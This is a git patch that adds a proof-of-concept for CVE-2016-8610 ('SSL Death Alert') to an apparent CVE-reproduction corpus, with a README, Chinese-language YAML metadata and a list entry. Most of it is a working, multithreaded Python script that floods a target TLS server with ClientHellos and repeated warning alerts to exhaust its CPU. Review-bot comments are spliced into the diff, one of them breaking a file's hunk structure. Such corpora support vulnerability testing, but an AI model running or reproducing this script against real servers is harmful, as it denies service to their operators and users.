From cec63962e0930a2ef5e03c9821fcaeb89a6ab58f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E5=A5=BD=E5=90=8D=E5=AD=97?=
Date: Mon, 17 Apr 2023 11:41:14 +0000
Subject: [PATCH] CVE-2016-8610
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: 好名字
---
 cve/openssl/2016/CVE-2016-8610/README.md | 14 +++
 .../2016/CVE-2016-8610/ssl-death-alert.py | 115 ++++++++++++++++++
 cve/openssl/2016/yaml/CVE-2016-8610.yaml | 19 +++
 openkylin_list.yaml | 1 +
 4 files changed, 149 insertions(+)
 create mode 100644 cve/openssl/2016/CVE-2016-8610/README.md
 create mode 100644 cve/openssl/2016/CVE-2016-8610/ssl-death-alert.py
 create mode 100644 cve/openssl/2016/yaml/CVE-2016-8610.yaml

diff --git a/cve/openssl/2016/CVE-2016-8610/README.md b/cve/openssl/2016/CVE-2016-8610/README.md
new file mode 100644
index 00000000..3eb697a6
--- /dev/null
+++ b/cve/openssl/2016/CVE-2016-8610/README.md
@@ -0,0 +1,14 @@
+# CVE-2016-8610 PoC
+CVE-2016-8610 (SSL Death Alert) PoC
+
+Usage:
+
+python ssl-death-alert.py DOMAIN/IP PORT PROTOCOL-VERSION(SSLv3, TLS1.0, TLS1.1, TLS1.2) NUMBER-OF-ALERTS(1000) THREADS(50)
+
+python ssl-death-alert.py test.tdl 443 TLS1.2 1000 50
+
+More info:
+
+http://security.360.cn/cve/CVE-2016-8610/
+
+https://securingtomorrow.mcafee.com/mcafee-labs/ssl-death-alert-cve-2016-8610-can-cause-denial-of-service-to-openssl-servers/
\ No newline at end of file
diff --git a/cve/openssl/2016/CVE-2016-8610/ssl-death-alert.py b/cve/openssl/2016/CVE-2016-8610/ssl-death-alert.py
new file mode 100644
index 00000000..44271893
--- /dev/null
+++ b/cve/openssl/2016/CVE-2016-8610/ssl-death-alert.py
@@ -0,0 +1,115 @@
+#!/usr/bin/python
+
+import socket
+import errno
+from socket import error as socket_error
+import threading
+import os
+import sys
+
+def MAIN_CHECK(HOSTARG,PORTARG):
+ s0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ result = s0.connect_ex((HOSTARG, PORTARG))
+ s0.close()
+ if result:
+ print("https://"+HOST+":"+str(PORT)+" seems to be down? :(\nCheck if service is running or maybe we are blocked?")
+ exit(1)
+
+def SEDNALL():
+ while True:
+ try:
+ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ sock.settimeout(5)
+ sock.connect((HOST, PORT))
+ sock.send(final_client_hello)
+ sock.send(final_client_alert)
+ sock.close
+ except socket_error as serr:
+ pass
+
+def INIT():
+ try:
+ while True:
+ SEDNALL()
+ except socket_error as serr:
+ SEDNALL()
+
+
+if len(sys.argv) != 6:
+ print("\nUsage: python "+sys.argv[0]+" DOMAIN/IP PORT PROTOCOL-VERSION(SSLv3, TLS1.0, TLS1.1, TLS1.2) NUMBER-OF-ALERTS(1000) THREADS(50)\nUsage: python "+sys.argv[0]+" test.tdl 443 TLS1.2 1000 50\nCheck of the server supports the protocol before testing it ...")
+ exit(1)
+
+HOST, PORT = sys.argv[1], int(sys.argv[2])
+MAIN_CHECK(HOST,PORT)
+
+#SSL Client Hello
+sslv3=b'\x16\x03\x00\x00\x8a\x01\x00\x00\x86\x03\x00\x08\x87\x37\x72\xa4\xc5\xb7\xee\x72\x1a\x28\x52\x95\x5f\x4e\x8b\x80\x33\x6e\x27\x49\x85\x33\x61\xa7\xeb\xbe\x70\xc7\x85\xab\x5b\x00\x00\x3e\xc0\x14\xc0\x0a\x00\x39\x00\x38\x00\x37\x00\x36\x00\x88\x00\x87\x00\x86\x00\x85\xc0\x0f\xc0\x05\x00\x35\x00\x84\xc0\x13\xc0\x09\x00\x33\x00\x32\x00\x31\x00\x30\x00\x45\x00\x44\x00\x43\x00\x42\xc0\x0e\xc0\x04\x00\x2f\x00\x41\x00\x05\x00\x04\x00\xff\x01\x00\x00\x1f\x00\x0b\x00\x04\x03\x00\x01\x02\x00\x0a\x00\x0a\x00\x08\x00\x17\x00\x19\x00\x18\x00\x16\x00\x23\x00\x00\x00\x0f\x00\x01\x01'
+tls10=b'\x16\x03\x01\x00\x8a\x01\x00\x00\x86\x03\x01\x08\x87\x37\x72\xa4\xc5\xb7\xee\x72\x1a\x28\x52\x95\x5f\x4e\x8b\x80\x33\x6e\x27\x49\x85\x33\x61\xa7\xeb\xbe\x70\xc7\x85\xab\x5b\x00\x00\x3e\xc0\x14\xc0\x0a\x00\x39\x00\x38\x00\x37\x00\x36\x00\x88\x00\x87\x00\x86\x00\x85\xc0\x0f\xc0\x05\x00\x35\x00\x84\xc0\x13\xc0\x09\x00\x33\x00\x32\x00\x31\x00\x30\x00\x45\x00\x44\x00\x43\x00\x42\xc0\x0e\xc0\x04\x00\x2f\x00\x41\x00\x05\x00\x04\x00\xff\x01\x00\x00\x1f\x00\x0b\x00\x04\x03\x00\x01\x02\x00\x0a\x00\x0a\x00\x08\x00\x17\x00\x19\x00\x18\x00\x16\x00\x23\x00\x00\x00\x0f\x00\x01\x01'
+tls11=b'\x16\x03\x02\x00\x8a\x01\x00\x00\x86\x03\x02\x08\x87\x37\x72\xa4\xc5\xb7\xee\x72\x1a\x28\x52\x95\x5f\x4e\x8b\x80\x33\x6e\x27\x49\x85\x33\x61\xa7\xeb\xbe\x70\xc7\x85\xab\x5b\x00\x00\x3e\xc0\x14\xc0\x0a\x00\x39\x00\x38\x00\x37\x00\x36\x00\x88\x00\x87\x00\x86\x00\x85\xc0\x0f\xc0\x05\x00\x35\x00\x84\xc0\x13\xc0\x09\x00\x33\x00\x32\x00\x31\x00\x30\x00\x45\x00\x44\x00\x43\x00\x42\xc0\x0e\xc0\x04\x00\x2f\x00\x41\x00\x05\x00\x04\x00\xff\x01\x00\x00\x1f\x00\x0b\x00\x04\x03\x00\x01\x02\x00\x0a\x00\x0a\x00\x08\x00\x17\x00\x19\x00\x18\x00\x16\x00\x23\x00\x00\x00\x0f\x00\x01\x01'
+tls12=b'\x16\x03\x03\x00\x8a\x01\x00\x00\x86\x03\x03\x08\x87\x37\x72\xa4\xc5\xb7\xee\x72\x1a\x28\x52\x95\x5f\x4e\x8b\x80\x33\x6e\x27\x49\x85\x33\x61\xa7\xeb\xbe\x70\xc7\x85\xab\x5b\x00\x00\x3e\xc0\x14\xc0\x0a\x00\x39\x00\x38\x00\x37\x00\x36\x00\x88\x00\x87\x00\x86\x00\x85\xc0\x0f\xc0\x05\x00\x35\x00\x84\xc0\x13\xc0\x09\x00\x33\x00\x32\x00\x31\x00\x30\x00\x45\x00\x44\x00\x43\x00\x42\xc0\x0e\xc0\x04\x00\x2f\x00\x41\x00\x05\x00\x04\x00\xff\x01\x00\x00\x1f\x00\x0b\x00\x04\x03\x00\x01\x02\x00\x0a\x00\x0a\x00\x08\x00\x17\x00\x19\x00\x18\x00\x16\x00\x23\x00\x00\x00\x0f\x00\x01\x01'
+
+#Client Alert - (Level: Warning, Description: Certificate Unknown)
+alertsslv3=b'\x15\x03\x00\x00\x02\x01\x2e'
+alerttls10=b'\x15\x03\x01\x00\x02\x01\x2e'
+alerttls11=b'\x15\x03\x02\x00\x02\x01\x2e'
+alerttls12=b'\x15\x03\x03\x00\x02\x01\x2e'
+
+final_client_alert=b''
+protocol_version_used=""
+
+if str(sys.argv[3]) == "SSLv3":
+ final_client_hello=sslv3
+ use_client_alert=alertsslv3
+ protocol_version_used="Using SSL v3 protocol"
+elif str(sys.argv[3]) == "TLS1.0":
+ final_client_hello=tls10
+ use_client_alert=alerttls10
+ protocol_version_used="Using TLS 1.0"
+elif str(sys.argv[3]) == "TLS1.1":
+ final_client_hello=tls11
+ use_client_alert=alerttls11
+ protocol_version_used="Using TLS 1.1 protocol"
+elif str(sys.argv[3]) == "TLS1.2":
+ final_client_hello=tls12
+ use_client_alert=alerttls12
+ protocol_version_used="Using TLS 1.2 protocol"
+else:
+ print("Error: PROTOCOL-VERSION must be SSLv3 or TLS1.0 or TLS1.1 or TLS1.2")
+ exit(1)
+
+try:
+ numberofalerts=int(sys.argv[4])
+except ValueError:
+ print("Error: Number of Alerts must be interger - 1000 is a good start")
+ exit(1)
+
+try:
+ numberofthreads=int(sys.argv[5])
+except ValueError:
+ print("Error: Number of Threads must be interger greater than 1 - 50 is a good start")
+ exit(1)
+
+if numberofthreads == 1 or numberofthreads == 0 or numberofthreads < 0:
+ print("Error: Number of Threads must be interger greater than 1 - 50 is a good start")
+ exit(1)
+
+for x in range(1, numberofalerts):
+ final_client_alert+=use_client_alert
+
+threads = []
+for n in range(1,numberofthreads):
+ thread = threading.Thread(target=INIT)
+ thread.setDaemon(True)
+ thread.start()
+ threads.append(thread)
+alertsize=sys.getsizeof(final_client_alert)
+print(protocol_version_used)
+print("Size of the Client Alert payload: "+str(alertsize/1024)+"."+str(alertsize%1024)+" kilobytes")
+print("Attacking ...")
+
+try:
+ for thread in threads:
+ thread.join(999999)
+except KeyboardInterrupt:
+ print("\nExiting ...")
+ os._exit(0)
\ No newline at end of file
diff --git a/cve/openssl/2016/yaml/CVE-2016-8610.yaml b/cve/openssl/2016/yaml/CVE-2016-8610.yaml
new file mode 100644
index 00000000..4d87e46b
--- /dev/null
+++ b/cve/openssl/2016/yaml/CVE-2016-8610.yaml
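Review bot: MAIN_CHECK builds its failure message from the module globals `HOST` and `PORT` instead of its own `HOSTARG`/`PORTARG` parameters, so the printed target is only right because the one caller happens to pass those globals; the line should read `print("https://"+HOSTARG+":"+str(PORTARG)+" seems to be down? :(\nCheck if service is running or maybe we are blocked?")`. The size report uses `sys.getsizeof(final_client_alert)`, which counts the bytes object's header as well as its contents, and `str(alertsize/1024)+"."+str(alertsize%1024)` does not express a kilobyte value; `alertsize=len(final_client_alert)` followed by a single `str(alertsize/1024.0)` would report what the message claims. `range(1, numberofalerts)` and `range(1,numberofthreads)` yield one fewer alert record and one fewer thread than the usage text and the README's "1000 50" example state, which a comment or `range(numberofalerts)` should reconcile. `sock.close` in SEDNALL is an attribute reference rather than a call, so each socket is released only when garbage-collected; relatedly, the `except socket_error` branch in INIT can never run because SEDNALL swallows every `socket_error` itself, and `errno` is imported but unused. Prefer `sys.exit(1)` over the site-provided `exit(1)` in a script, and `threading.Thread(target=INIT, daemon=True)` over the deprecated `setDaemon`.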
@@ -0,0 +1,19 @@
+id: CVE-2016-8610
+source:
+ https://github.com/cujanovic/CVE-2016-8610-PoC
+info:
+ name: OpenSSL是Openssl团队的一个开源的能够实现安全套接层(SSLv2/v3)和安全传输层(TLSv1)协议的通用加密库。该产品支持多种加密算法,包括对称密码、哈希算法、安全散列算法等。
+ severity: high
+ description: 在 OpenSSL 0.9.8、1.0.1、1.0.2 至 1.0.2h 和 1.1.0 中发现一个拒绝服务缺陷,其方式是 TLS/SSL 协议定义连接握手期间 ALERT 数据包的处理方式。远程攻击者可利用此缺陷使 TLS/SSL 服务器消耗过多的 CPU,并且无法接受来自其他客户端的连接。
+ scope-of-influence:
+ OpenSSL 0.9.8、1.0.1、1.0.2 至 1.0.2h 和 1.1.0
+ reference:
+ - https://nvd.nist.gov/vuln/detail/cve-2016-8610
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+ cvss-score: 7.5
+ cve-id: CVE-2016-8610
+ cwe-id: CWE-400
+ cnvd-id: None
+ kve-id: None
+ tags: 拒绝服务,DoS
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index a39bab91..c8c1b2eb 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -142,6 +142,7 @@ cve:
 - CVE-2022-0778
 - CVE-2022-3786
 - CVE-2016-2107
+ - CVE-2016-8610
 joomla:
 - CVE-2023-23752
 libxml2:
-- Gitee
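Review bot: `cnvd-id: None` and `kve-id: None` in the new CVE-2016-8610.yaml are parsed by YAML as the string "None", not as a null value, so any consumer that tests these fields for absence will see them as populated. If the intent is "no such identifier", `cnvd-id: null` (or `~`) expresses that unambiguously; keep the string form only if the other entries in this corpus deliberately rely on it. The `source:` value placed on the following line is read as a plain scalar continuation, which works but is easy to misread next to the `reference:` list; a same-line `source: https://github.com/cujanovic/CVE-2016-8610-PoC` would be clearer.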